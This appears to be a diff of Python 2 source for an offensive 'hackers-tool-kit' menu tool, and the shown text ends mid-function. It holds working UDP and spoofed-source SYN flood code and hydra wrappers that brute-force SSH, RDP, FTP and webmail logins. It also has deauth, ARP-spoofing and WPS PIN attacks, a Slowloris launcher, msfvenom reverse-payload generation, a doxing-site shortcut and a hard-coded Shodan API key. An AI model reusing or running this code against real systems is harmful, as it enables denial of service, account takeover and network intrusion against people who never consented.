SCAN HOST START# -#--------------------# -def info(): - params = [] - # Browser - br = mechanize.Browser() - - # Just some colors and shit - white = '\033[1;97m' - green = '\033[1;32m' - red = '\033[1;31m' - yellow = '\033[1;33m' - end = '\033[1;m' - info = '\033[1;33m[!]\033[1;m' - que = '\033[1;34m[?]\033[1;m' - bad = '\033[1;31m[-]\033[1;m' - good = '\033[1;32m[+]\033[1;m' - run = '\033[1;97m[~]\033[1;m' - - # Cookie Jar - cj = cookielib.LWPCookieJar() - br.set_cookiejar(cj) - - # Browser options - br.set_handle_equiv(True) - br.set_handle_redirect(True) - br.set_handle_referer(True) - br.set_handle_robots(False) - - # Follows refresh 0 but not hangs on refresh > 0 - br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1) - br.addheaders = [ - ('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')] - - - print '''\033[1;31m - _________ __ __ __ - / _____// |________|__| | __ ___________ - \_____ \\\\ __\_ __ \ | |/ // __ \_ __ \\ - / \| | | | \/ | <\ ___/| | \/ - /_______ /|__| |__| |__|__|_ \\\\___ >__| - \/ \/ \/\033[1;m''' - target = raw_input('\033[1;34m[?]\033[1;m Enter the target: ') - if 'http' in target: - parsed_uri = urlparse(target) - domain = '{uri.netloc}'.format(uri=parsed_uri) - else: - domain = target - try: - br.open('http://' + target) - target = 'http://' + target - except: - target = 'https://' + target - - def sqli(url): - print '%s Using SQLMap api to check for SQL injection vulnerabilities. Don\'t worry we are using an online service and it doesn\'t depend on your internet connection. This scan will take 2-3 minutes.' % run - br.open('https://suip.biz/?act=sqlmap') - br.select_form(nr=0) - br.form['url'] = url - req = br.submit() - result = req.read() - match = search(r"---(?s).*---", result) - if match: - print '%s One or more parameters are vulnerable to SQL injection' % good - option = raw_input( - '%s Would you like to see the whole report? [Y/n] ' % que).lower() - if option == 'n': - pass - else: - print '\033[1;31m-\033[1;m' * 40 - print match.group().split('---')[1][:-3] - print '\033[1;31m-\033[1;m' * 40 - else: - print '%s None of parameters is vulnerable to SQL injection' % bad - - - def cms(domain): - try: - result = br.open('https://whatcms.org/?s=' + domain).read() - detect = search(r'class="nowrap" title="[^<]*">', result) - WordPress = False - try: - r = br.open(target + '/robots.txt').read() - if "wp-admin" in str(r): - WordPress = True - except: - pass - if detect: - print '%s CMS Detected : %s' % (info, detect.group().split('class="nowrap" title="')[1][:-2]) - detect = detect.group().split('">')[1][:-27] - if 'WordPress' in detect: - option = raw_input( - '%s Would you like to use WPScan? [Y/n] ' % que).lower() - if option == 'n': - pass - else: - os.system('wpscan --random-agent --url %s' % domain) - elif WordPress: - print '%s CMS Detected : WordPress' % info - option = raw_input( - '%s Would you like to use WPScan? [Y/n] ' % que).lower() - if option == 'n': - pass - else: - os.system('wpscan --random-agent --url %s' % domain) - else: - print '%s %s doesn\'t seem to use a CMS' % (info, domain) - except: - pass - - def honeypot(ip_addr): - result = {"0.0": 0, "0.1": 10, "0.2": 20, "0.3": 30, "0.4": 40, "0.5": 50, "0.6": 60, "0.7": 70, "0.8": 80, "0.9": 90, "1.0": 10} - honey = 'https://api.shodan.io/labs/honeyscore/%s?key=C23OXE0bVMrul2YeqcL7zxb6jZ4pj2by' % ip_addr - try: - phoney = br.open(honey).read() - if float(phoney) >= 0.0 and float(phoney) <= 0.4: - what = good - else: - what = bad - print '{} Honeypot Probabilty: {}%'.format(what, result[phoney]) - except KeyError: - print '\033[1;31m[-]\033[1;m Honeypot prediction failed' - - def whoisIt(url): - who = "" - print '{} Trying to gather whois information for {}'.format(run,url) - try: - who = str(whois.whois(url)).decode() - except Exception: - pass - test = who.lower() - if "whoisguard" in test or "protection" in test or "protected" in test: - print '{} Whois Protection Enabled{}'.format(bad, end) - else: - print '{} Whois information found{}'.format(good, end) - try: - data = json.loads(who) - for key in data.keys(): - print "{} :".format(key.replace("_", " ").title()), - if type(data[key]) == list: - print ", ".join(data[key]) - else: - print "{}".format(data[key]) - except ValueError: - print '{} Unable to build response, visit https://who.is/whois/{} {}'.format(bad, url, end) - pass - - def nmap(ip_addr): - port = 'http://api.hackertarget.com/nmap/?q=' + ip_addr - result = br.open(port).read() - result = sub(r'Starting[^<]*\)\.', '', result) - result = sub(r'Service[^<]*seconds', '', result) - result = os.linesep.join([s for s in result.splitlines() if s]) - print result - - def bypass(domain): - post = urlencode({'cfS': domain}) - result = br.open( - 'http://www.crimeflare.info/cgi-bin/cfsearch.cgi ', post).read() - - match = search(r' \b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\b', result) - if match: - bypass.ip_addr = match.group().split(' ')[1][:-1] - print '%s Real IP Address : %s' % (good, bypass.ip_addr) - - def dnsdump(domain): - res = DNSDumpsterAPI(False).search(domain) - print '\n%s DNS Records' % good - for entry in res['dns_records']['dns']: - print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) - for entry in res['dns_records']['mx']: - print '\n%s MX Records' % good - print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) - print '\n\033[1;32m[+]\033[1;m Host Records (A)' - for entry in res['dns_records']['host']: - if entry['reverse_dns']: - print '{domain} ({reverse_dns}) ({ip}) {as} {provider} {country}'.format(**entry) - else: - print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) - print '\n%s TXT Records' % good - for entry in res['dns_records']['txt']: - print entry - print '\n%s DNS Map: https://dnsdumpster.com/static/map/%s.png\n' % (good, domain.strip('www.')) - - - def fingerprint(ip_addr): - try: - result = br.open('https://www.censys.io/ipv4/%s/raw' % ip_addr).read() - match = search(r'"os_description": "[^<]*"', result) - if match: - print '%s Operating System : %s' % (good, match.group().split('n": "')[1][:-5]) - except: - pass - - - ip_addr = socket.gethostbyname(domain) - print '%s IP Address : %s' % (info, ip_addr) - try: - r = requests.get(target) - header = r.headers['Server'] - if 'cloudflare' in header: - print '%s Cloudflare detected' % bad - bypass(domain) - try: - ip_addr = bypass.ip_addr - except: - pass - else: - print '%s Server: %s' % (info, header) - try: - print '%s Powered By: %s' % (info, r.headers['X-Powered-By']) - except: - pass - try: - r.headers['X-Frame-Options'] - except: - print '%s Clickjacking protection is not in place.' % good - except: - pass - fingerprint(ip_addr) - cms(domain) - try: - honeypot(ip_addr) - except: - pass - print "{}----------------------------------------{}".format(red, end) - whoisIt(domain) - try: - r = br.open(target + '/robots.txt').read() - print '\033[1;31m-\033[1;m' * 40 - print '%s Robots.txt retrieved\n' % good, r - except: - pass - print '\033[1;31m-\033[1;m' * 40 - nmap(ip_addr) - print '\033[1;31m-\033[1;m' * 40 - dnsdump(domain) - os.system('cd plugins && python theHarvester.py -d %s -b all' % domain) - try: - br.open(target) - print '%s Crawling the target for fuzzable URLs' % run - for link in br.links(): - if 'http' in link.url or '=' not in link.url: - pass - else: - url = target + '/' + link.url - params.append(url) - if len(params) == 0: - print '%s No fuzzable URLs found' % bad - quit() - print '%s Found %i fuzzable URLs' % (good, len(params)) - for url in params: - print url - sqli(url) - url = url.replace('=', '') - r = br.open(url).read() - if '' in r: - print '%s One or more parameters are vulnerable to XSS' % good - break - print '%s These are the URLs having parameters:' % good - for url in params: - print url - except: - pass -#------------------# -#INFO SCAN HOST END# - - -#INFO ON YOUR SYSTEM START# -#-------------------------# -def sysinfo(): - os.system("iwconfig") - k = raw_input("Interface: ") - os.system("clear") - os.system("ifconfig") - print "\n" - os.system("iwconfig") - print "\n" - os.system("neofetch") - print "\n" - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - gateway = gw[2] - host = socket.gethostname() - print (" IP: ", ipaddr, " Gateway: ", gateway, " Host: ", host) - print "\n Router IP" - print "----------------------------\033[92m" - os.system('curl "http://myexternalip.com/raw"') - print "\n\033[0m----------------------------" - print "\n" - show = 'macchanger -s {0}'.format(k) - os.system(show) -#-----------------------# -#INFO ON YOUR SYSTEM END# - - -#ALL METASPLOIT EXPLOITS START# -#-----------------------------# -def msfex(): - os.system("service postgresql start") - os.system("""msfconsole -x 'show exploits'""") -#---------------------------# -#ALL METASPLOIT EXPLOITS END# - - -#UDP DOS START# -#-------------# -def udp(): - target = raw_input(N+"Target:\033[91m ") - ip = socket.gethostbyname(target) - port = input(N+"Port:\033[91m ") - os.system("service tor restart") - print N+"udp attack started on {0}.{1} | {2}-{3}-{4}".format(hour, minute, day, month, year) - os.system("sleep 2s") - sent = 0 - print "KILLING %s CONNECTIONS"%(ip) - while True: - sock.sendto(Gb, (ip,port)) - sock.sendto(bytes, (ip,port)) - sock.sendto(Kb, (ip,port)) - sent = sent + 1 - port = port + 1 - print B+"|+| Slapping \033[0m|\033[31m %s \033[0m| Port |\033[31m %s \033[0m| Bytes |\033[31m %s \033[0m|"%(ip,port,sent) - if port == 65534: - port = 1 -#-----------# -#UDP DOS END# - -#TCP FLOOD START# -#---------------# -def tcp(): - print Y+"-p = port | -t = threads | Example: tcp 95.52.541.1 -p 80 -t 600\033[0m" - print "\n" - tcp = raw_input(Y+"[\033[92m+\033[91m-\033[0mTCP\033[91m-\033[92m+\033[93m]\033[0m ") - print R+"IF YOU GET SPAMMED WITH ERRORS BUT ITS STILL RUNNING ITS FINE\033[0m" - os.system("sleep 5") - os.system("python /root/hackers-tool-kit/tools/" + tcp) -#-------------# -#TCP FLOOD END# - - -#SYN FLOOD START# -#---------------# -def syn(): - def randomIP(): - ip = ".".join(map(str, (random.randint(0,255)for _ in range(4)))) - return ip - - def randInt(): - x = random.randint(1000,9000) - return x - - def SYN_Flood(dstIP,dstPort,counter): - total = 0 - print "Packets are sending ..." - for x in range (0,counter): - s_port = randInt() - s_eq = randInt() - w_indow = randInt() - - IP_Packet = IP () - IP_Packet.src = randomIP() - IP_Packet.dst = dstIP - - TCP_Packet = TCP () - TCP_Packet.sport = s_port - TCP_Packet.dport = dstPort - TCP_Packet.flags = "S" - TCP_Packet.seq = s_eq - TCP_Packet.window = w_indow - - send(IP_Packet/TCP_Packet, verbose=0) - total+=1 - sys.stdout.write("\nTotal packets sent: %i\n" % total) - - - def info(): - - dstIP = raw_input ("\nTarget IP : ") - dstPort = input ("Target Port : ") - - return dstIP,int(dstPort) - - - def main(): - dstIP,dstPort = info() - counter = input ("Packets : ") - SYN_Flood(dstIP,dstPort,int(counter)) - - main() -#-------------# -#SYN FLOOD END# - - -#PING A HOST START# -#-----------------# -def ping(): - p = raw_input("Enter Host: ") - os.system("ping " + p) -#---------------# -#PING A HOST END# - - -#ALL METASPLOIT PAYLOADS START# -#-----------------------------# -def msfpa(): - os.system("service postgresql start") - os.system("""msfconsole -x 'show payloads'""") -#---------------------------# -#ALL METASPLOIT PAYLOADS END# - - -#ALL METASPLOIT AUX START# -#------------------------# -def msfau(): - os.system("service postgresql start") - os.system("""msfconsole -x 'show auxiliary'""") -#----------------------# -#ALL METASPLOIT AUX END# - - -#START METASPLOIT HANDLER START# -#------------------------------# -def multih(): - os.system("service postgresql start") - os.system("""msfconsole -x 'use multi/handler'""") -#----------------------------# -#START METASPLOIT HANDLER END# - - -#ALL METASPLOIT MODS START# -#-------------------------# -def msfall(): - os.system("service postgresql start") - os.sytem("""msfconsole -x 'show all'""") -#-----------------------# -#ALL METASPLOIT MODS END# - - -#HYDRA AUTOMATED START# -#---------------------# -def hydra(): - """ - This program is just a small program to shorten brute force sessions on hydra :) - But to be more satisfying results of the brute force. You better interact directly with hydra, - without having to use this black hydra console first: '). - If you find any errors in running our program. Can chat via facebook :). - Hydra is needed for the process of this program :). - """ - import sys, os, time - - # Restart #################### - def restart_program(): - python = sys.executable - os.execl(python, python, * sys.argv) - curdir = os.getcwd() - ############################## - - os.system("clear") - print B+"___ _ ____ ____ _ _ _ _ _ _ ___ ____ ____" - print "|__] | |__| | |_/ |__| \_/ | \ |__/ |__|" - print "|__] |___ | | |___ | \_ | | | |__/ | \ | |" - print G+"-----------------------------------------------------" - print N+"[]xxxxx[]::::::::::::::::::::> 24-07-2017 (7:53)" - print R+" [*] Author: DedSecTL --- [*] Version 1.0" - print N+"c=={:::::::::::::::> Black Hydra Console" - print R+" [*] My FB : https://m.facebook.com/100004136748473" - print N+"(}xxx{):::::::::> AndroSec1337 Cyber Team" - print - print " ===|[ Brute Force ]|===" - print - print " [01] Cisco Brute Force " - print " [02] VNC Brute Force " - print " [03] FTP Brute Force " - print " [04] Gmail Brute Force " - print " [05] SSH Brute Force " - print " [06] TeamSpeak Brute Force " - print " [07] Telnet Brute Force " - print " [08] Yahoo Mail Brute Force " - print " [09] Hotmail Brute Force " - print " [10] Router Speedy Brute Force " - print " [11] RDP Brute Force " - print " [12] MySQL Brute Force " - print - print " [00] Exit" - print - bhydra = raw_input("[*] B-Hydra > ") - - if bhydra == '01' or bhydra == '1': - print - print " +---------------------------+" - print " | Cisco Brute Force |" - print " +---------------------------+" - print - print - iphost = raw_input("[*] IP/Hostname : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -P %s %s cisco" % (word, iphost)) - sys.exit() - - elif bhydra == '02' or bhydra == '2': - print - print " +---------------------------+" - print " | VNC Brute Force |" - print " +---------------------------+" - print - print - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -P %s -e n -t 1 %s vnc -V" % (word, iphost)) - iphost = raw_input("[*] IP/Hostname : ") - - elif bhydra == '03' or bhydra == '3': - print - print " +------------------------------+" - print " | FTP Brute Force |" - print " +------------------------------+" - print - print - user = raw_input("[*] User : ") - iphost = raw_input("[*] IP/Hostname : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -l %s -P %s %s ftp" % (user, word, iphost)) - sys.exit() - - elif bhydra == '04' or bhydra == '4': - print - print " +------------------------------+" - print " | Gmail Brute Force |" - print " +------------------------------+" - print - print - email = raw_input("[*] Email : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -l %s -P %s -s 465 smtp.gmail.com smtp" % (email, word)) - sys.exit() - - elif bhydra == '05' or bhydra == '5': - print - print " +--------------------------------+" - print " | SSH Brute Force |" - print " +--------------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -l %s -P %s %s ssh" % (user, word, iphost)) - sys.exit() - - elif bhydra == '06' or bhydra == '6': - print - print " +-------------------------+" - print " | TeamSpeak Brute Force |" - print " +-------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -l %s -P %s -s 8676 %s teamspeak" % (user, word, iphost)) - sys.exit() - - elif bhydra == '07' or bhydra == '7': - print - print " +-------------------------+" - print " | Telnet Brute Force |" - print " +-------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -l %s -P %s %s telnet" % (user, word, iphost)) - sys.exit() - - elif bhydra == '08' or bhydra == '8': - print - print " +---------------------------+" - print " | Yahoo Brute Force |" - print " +---------------------------+" - print - print - email = raw_input("[*] Email : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -l %s -P %s -s 587 smtp.mail.yahoo.com smtp" % (email, word)) - sys.exit() - - elif bhydra == '09' or bhydra == '9': - print - print " +----------------------------+" - print " | Hotmail Brute Force |" - print " +----------------------------+" - print - print - email = raw_input("[*] Email : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -l %s -P %s -s 587 smtp.live.com smtp" % (email, word)) - sys.exit() - - elif bhydra == '10': - print - print " +-----------------------------+" - print " | Router Speedy Brute Force |" - print " +-----------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -m / -l %s -P %s %s http-get" % (user, word, iphost)) - sys.exit() - - elif bhydra == '11': - print - print " +----------------------------+" - print " | RDP Brute Force |" - print " +----------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -t 1 -V -f -l %s -P %s %s rdp" % (user, word, iphost)) - sys.exit() - - elif bhydra == '12': - print - print " +-----------------------------+" - print " | MySQL Brute Force |" - print " +-----------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -t 5 -V -f -l %s -e ns -P %s localhost mysql" % (user, word)) - - elif bhydra == '00' or bhydra == '0': - print "\n[!] Exit the Program..." - sys.exit() - - else: - print "\n[!] ERROR : Wrong Input" - time.sleep(1) - restart_program() -#-------------------# -#HYDRA AUTOMATED END# - - -#WORDLIST MAKER START# -#--------------------# -def cupp(): - os.system("cd /root/hackers-tool-kit/wordlists && cupp -i") - print Y+"wordlist saved to /root/hackers-tool-kit/wordlists\033[0m" -#------------------# -#WORDLIST MAKER END# - - -#LIST FILES START# -#----------------# -def vdir(): - print "\n" - os.system("ls") - print Y+"! doesnt have to be these can be any directory !\033[0m" - print "\n" - h = raw_input("Directory Path: ") - print "\n" - print "--------------------------------------------------------------------------------------------------------------------------------------------" - os.system("ls " + h) - print "--------------------------------------------------------------------------------------------------------------------------------------------" -#--------------# -#LIST FILES END# - - -#MONITOR MODE OFF START# -#----------------------# -def monoff(): - os.system("iwconfig") - i = raw_input("Select Interface: ") - os.system("airmon-ng stop " + i) -#--------------------# -#MONITOR MODE OFF END# - - -#TURN ON VPN START# -#-----------------# -def vpn(): - os.system("anonsurf start") - os.system("anonsurf myip") -#---------------# -#TURN ON VPN END# - - -#TURN OFF VPN START# -#------------------# -def vpnoff(): - os.system("anonsurf stop") - os.system("anonsurf myip") -#----------------# -#TURN OFF VPN END# - - -#SLOW LORIS DOS START# -#--------------------# -def slowl(): - de = raw_input("Delay: ") - tar = raw_input("RHOST: ") - port = raw_input("RPORT: ") - soc = raw_input("Sockets: ") - os.system('echo "use auxiliary/dos/http/slowloris\n" > slowl.rc') - os.system('echo "set delay {0}\n" >> slowl.rc'.format(de)) - os.system('echo "set RHOST {0}\n" >> slowl.rc'.format(tar)) - os.system('echo "set RPORT {0}\n" >> slowl.rc'.format(port)) - os.system('echo "set sockets {0}\n" >> slowl.rc'.format(soc)) - os.system('echo "run\n" >> slowl.rc') - os.system('msfconsole -r slowl.rc') - os.system('rm -rf slowl.rc') -#------------------# -#SLOW LORIS DOS END# - - -#OPEN DOX WEBSITE START# -#----------------------# -def pidox(): - print Y+"! USING FIREFOX !\033[0m" - os.system("sleep 2") - os.system("firefox https://pipl.com/") -#--------------------# -#OPEN DOX WEBSITE END# - - -#SCAN SPECIFIC NET START# -#-----------------------# -def specnet(): - jk = raw_input("BSSID: ") - kj = raw_input("ESSID: ") - os.system("iwconfig") - k = raw_input("INTERFACE: ") - print Y+"WOULD YOU LIKE TO SAVE YOUR SCAN RESULTS?\033[0m" - j = raw_input("[y/n]> ") - if j == "y": - a = 'airodump-ng -w /root/SCAN --bssid {0} --essid {1} {2}'.format(jk,kj,k) - os.system(a) - if j == "n": - a = 'airodump-ng --bssid {0} --essid {1} {2}'.format(jk,kj,k) - os.system(a) -#---------------------# -#SCAN SPECIFIC NET END# - - -#DEFAULT WIFI PIN START# -#----------------------# -def pingen(): - j = raw_input("Enter BSSID: ") - a = 'cd /root/hackers-tool-kit/tools && python pingen.py {0}'.format(j) - os.system(a) -#--------------------# -#DEFAULT WIFI PIN END# - - -#WIFI PIN BRUTEFORCE START# -#-------------------------# -def reaver(): - os.system("iwconfig") - j = raw_input("Select Interface: ") - k = raw_input("Enter BSSID: ") - a = 'reaver -i {0} -b {1} -vv'.format(j,k) - os.system(a) -#-----------------------# -#WIFI PIN BRUTEFORCE END# - - -#DEAUTH ATTACK START# -#-------------------# -def deauth(): - print Y+"! YOU MAY HAVE TO CHANGE YOUR WIFI CHANNEL !\033[0m" - j = raw_input("Enter BSSID> ") - os.system("iwconfig") - k = raw_input("Enter Interface> ") - a = 'aireplay-ng -0 0 -a {0} {1}'.format(j,k) - os.system(a) -#-----------------# -#DEAUTH ATTACK END# - - -#MAC CHANGER START# -#-----------------# -def macc(): - os.system("iwconfig") - k = raw_input("Interface: ") - c = 'ifconfig {0} down'.format(k) - os.system(c) - os.system("macchanger -r " + k) - s = 'ifconfig {0} up'.format(k) - os.system(s) -#-----------------# -#MAC CHANGER START# - - -#MAC CHANGER OFF START# -#---------------------# -def macoff(): - os.system("iwconfig") - k = raw_input("Interface: ") - c = 'ifconfig {0} down'.format(k) - os.system(c) - os.system("macchanger -p " + k) - s = 'ifconfig {0} up'.format(k) - os.system(s) -#-------------------# -#MAC CHANGER OFF END# - - -#ARP SPOOF START# -#---------------# -def arpspoof(): - print "\033[93mif using multiple targets heres an example: 134.143.1.3, 134.143.1.6\033[0m\n" - h = raw_input("Targets: ") - os.system('echo "net.sniff on\n" >> arp.cap') - os.system('echo "set arp.spoof.targets {0}\n" >> arp.cap'.format(h)) - os.system('echo "arp.spoof on\n" >> arp.cap') - print '\n\033[93mto stop type "exit"\033[0m' - os.system("sleep 2") - os.system("bettercap -no-history -caplet arp.cap") - os.system("rm arp.cap") -#-------------# -#ARP SPOOF END# - - -#SSL SCAN START# -#--------------# -def sslscan(): - j = raw_input('Enter Target: ') - a = 'sslscan {0}'.format(j) - os.system(a) -#------------# -#SSL SCAN END# - - -#MAKE A PAYLOAD START# -#--------------------# -def payload(): - os.system("cat /root/hackers-tool-kit/tools/payloads.txt") - print "\n" - f = raw_input("Select Payload: ") - l = raw_input("LHOST: ") - c = raw_input("LPORT: ") - os.system("cat /root/hackers-tool-kit/tools/formats.txt") - s = raw_input("Format: ") - h = raw_input("File Name: ") - a = 'msfvenom -p {0} LHOST={1} LPORT={2} -f {3} -o /root/{4}.{5}'.format(f,l,c,s,h,s) - os.system(a) -#------------------# -#MAKE A PAYLOAD END# - - -#WORDLIST MAKER START# -#--------------------# -def crunch(): - print "minimal number of characters" - j = raw_input("[CRUNCH]: ") - print "maximum number of characters" - k = raw_input("[CRUNCH]: ") - print "what characters should be in it" - b = raw_input("[CRUNCH]: ") - print "name of file" - s = raw_input("[CRUNCH]: ") - a = 'crunch {0} {1} {2} -o /root/hackers-tool-kit/wordlists/{3}'.format(j,k,b,s) - os.system(a) - print Y+"wordlist saved to \033[0m/root/hackers-tool-kit/wordlists/" + s -#------------------# -#WORDLIST MAKER END# - - -#INTERNET TRAFFIC START# -#----------------------# -def traff(): - os.system("iwconfig") - s = raw_input("Select Interface: ") - os.system("tcpdump -i " + s) -#--------------------# -#INTERNET TRAFFIC END# - - -#RESET ACCOUNT PASSWORD START# -#----------------------------# -def resa(): - j = raw_input("USERNAME: ") - k = raw_input("NEW PASSWORD: ") - print "are you sure?" - q = raw_input("[y/n]: ") - if q == "n": - os.system("clear") - mainbanner() - if q == "y": - a = 'echo "{0}:{1}" | chpasswd'.format(j,k) - print "password for {0} has been reset".format(j) -#--------------------------# -#RESET ACCOUNT PASSWORD END# - - -#RESET UNIX PASSWORD START# -#-------------------------# -def resu(): - j = raw_input("PASSWORD: ") - print "are you sure?" - q = raw_input("[y/n]: ") - if q == "n": - os.system("clear") - mainbanner() - if q == "y": - a = 'passwd {0}'.format(j) - print "unix password has been reset".format(j) -#-----------------------# -#RESET UNIX PASSWORD END# - - -#FIND HASH TYPE START# -#--------------------# -def hashid(): - #!/usr/bin/python - # encoding: utf-8 - # Hash Identifier v1.1 - # By Zion3R - # www.Blackploit.com - # Root@Blackploit.com - - logo=''' ######################################################################### - # __ __ __ ______ _____ # - # /\ \/\ \ /\ \ /\__ _\ /\ _ `\ # - # \ \ \_\ \ __ ____ \ \ \___ \/_/\ \/ \ \ \/\ \ # - # \ \ _ \ /'__`\ / ,__\ \ \ _ `\ \ \ \ \ \ \ \ \ # - # \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \ \_\ \__ \ \ \_\ \ # - # \ \_\ \_\ \___ \_\/\____/ \ \_\ \_\ /\_____\ \ \____/ # - # \/_/\/_/\/__/\/_/\/___/ \/_/\/_/ \/_____/ \/___/ v1.1 # - # By Zion3R # - # www.Blackploit.com # - # Root@Blackploit.com # - #########################################################################''' - - algorithms={"102020":"ADLER-32", "102040":"CRC-32", "102060":"CRC-32B", "101020":"CRC-16", "101040":"CRC-16-CCITT", "104020":"DES(Unix)", "101060":"FCS-16", "103040":"GHash-32-3", "103020":"GHash-32-5", "115060":"GOST R 34.11-94", "109100":"Haval-160", "109200":"Haval-160(HMAC)", "110040":"Haval-192", "110080":"Haval-192(HMAC)", "114040":"Haval-224", "114080":"Haval-224(HMAC)", "115040":"Haval-256", "115140":"Haval-256(HMAC)", "107080":"Lineage II C4", "106025":"Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))", "102080":"XOR-32", "105060":"MD5(Half)", "105040":"MD5(Middle)", "105020":"MySQL", "107040":"MD5(phpBB3)", "107060":"MD5(Unix)", "107020":"MD5(Wordpress)", "108020":"MD5(APR)", "106160":"Haval-128", "106165":"Haval-128(HMAC)", "106060":"MD2", "106120":"MD2(HMAC)", "106040":"MD4", "106100":"MD4(HMAC)", "106020":"MD5", "106080":"MD5(HMAC)", "106140":"MD5(HMAC(Wordpress))", "106029":"NTLM", "106027":"RAdmin v2.x", "106180":"RipeMD-128", "106185":"RipeMD-128(HMAC)", "106200":"SNEFRU-128", "106205":"SNEFRU-128(HMAC)", "106220":"Tiger-128", "106225":"Tiger-128(HMAC)", "106240":"md5($pass.$salt)", "106260":"md5($salt.'-'.md5($pass))", "106280":"md5($salt.$pass)", "106300":"md5($salt.$pass.$salt)", "106320":"md5($salt.$pass.$username)", "106340":"md5($salt.md5($pass))", "106360":"md5($salt.md5($pass).$salt)", "106380":"md5($salt.md5($pass.$salt))", "106400":"md5($salt.md5($salt.$pass))", "106420":"md5($salt.md5(md5($pass).$salt))", "106440":"md5($username.0.$pass)", "106460":"md5($username.LF.$pass)", "106480":"md5($username.md5($pass).$salt)", "106500":"md5(md5($pass))", "106520":"md5(md5($pass).$salt)", "106540":"md5(md5($pass).md5($salt))", "106560":"md5(md5($salt).$pass)", "106580":"md5(md5($salt).md5($pass))", "106600":"md5(md5($username.$pass).$salt)", "106620":"md5(md5(md5($pass)))", "106640":"md5(md5(md5(md5($pass))))", "106660":"md5(md5(md5(md5(md5($pass)))))", "106680":"md5(sha1($pass))", "106700":"md5(sha1(md5($pass)))", "106720":"md5(sha1(md5(sha1($pass))))", "106740":"md5(strtoupper(md5($pass)))", "109040":"MySQL5 - SHA-1(SHA-1($pass))", "109060":"MySQL 160bit - SHA-1(SHA-1($pass))", "109180":"RipeMD-160(HMAC)", "109120":"RipeMD-160", "109020":"SHA-1", "109140":"SHA-1(HMAC)", "109220":"SHA-1(MaNGOS)", "109240":"SHA-1(MaNGOS2)", "109080":"Tiger-160", "109160":"Tiger-160(HMAC)", "109260":"sha1($pass.$salt)", "109280":"sha1($salt.$pass)", "109300":"sha1($salt.md5($pass))", "109320":"sha1($salt.md5($pass).$salt)", "109340":"sha1($salt.sha1($pass))", "109360":"sha1($salt.sha1($salt.sha1($pass)))", "109380":"sha1($username.$pass)", "109400":"sha1($username.$pass.$salt)", "1094202":"sha1(md5($pass))", "109440":"sha1(md5($pass).$salt)", "109460":"sha1(md5(sha1($pass)))", "109480":"sha1(sha1($pass))", "109500":"sha1(sha1($pass).$salt)", "109520":"sha1(sha1($pass).substr($pass,0,3))", "109540":"sha1(sha1($salt.$pass))", "109560":"sha1(sha1(sha1($pass)))", "109580":"sha1(strtolower($username).$pass)", "110020":"Tiger-192", "110060":"Tiger-192(HMAC)", "112020":"md5($pass.$salt) - Joomla", "113020":"SHA-1(Django)", "114020":"SHA-224", "114060":"SHA-224(HMAC)", "115080":"RipeMD-256", "115160":"RipeMD-256(HMAC)", "115100":"SNEFRU-256", "115180":"SNEFRU-256(HMAC)", "115200":"SHA-256(md5($pass))", "115220":"SHA-256(sha1($pass))", "115020":"SHA-256", "115120":"SHA-256(HMAC)", "116020":"md5($pass.$salt) - Joomla", "116040":"SAM - (LM_hash:NT_hash)", "117020":"SHA-256(Django)", "118020":"RipeMD-320", "118040":"RipeMD-320(HMAC)", "119020":"SHA-384", "119040":"SHA-384(HMAC)", "120020":"SHA-256", "121020":"SHA-384(Django)", "122020":"SHA-512", "122060":"SHA-512(HMAC)", "122040":"Whirlpool", "122080":"Whirlpool(HMAC)"} - - # hash.islower() minusculas - # hash.isdigit() numerico - # hash.isalpha() letras - # hash.isalnum() alfanumerico - - def CRC16(): - hs='4607' - if len(hash)==len(hs) and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("101020") - def CRC16CCITT(): - hs='3d08' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("101040") - def FCS16(): - hs='0e5b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("101060") - - def CRC32(): - hs='b33fd057' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("102040") - def ADLER32(): - hs='0607cb42' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("102020") - def CRC32B(): - hs='b764a0d9' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("102060") - def XOR32(): - hs='0000003f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("102080") - - def GHash323(): - hs='80000000' - if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("103040") - def GHash325(): - 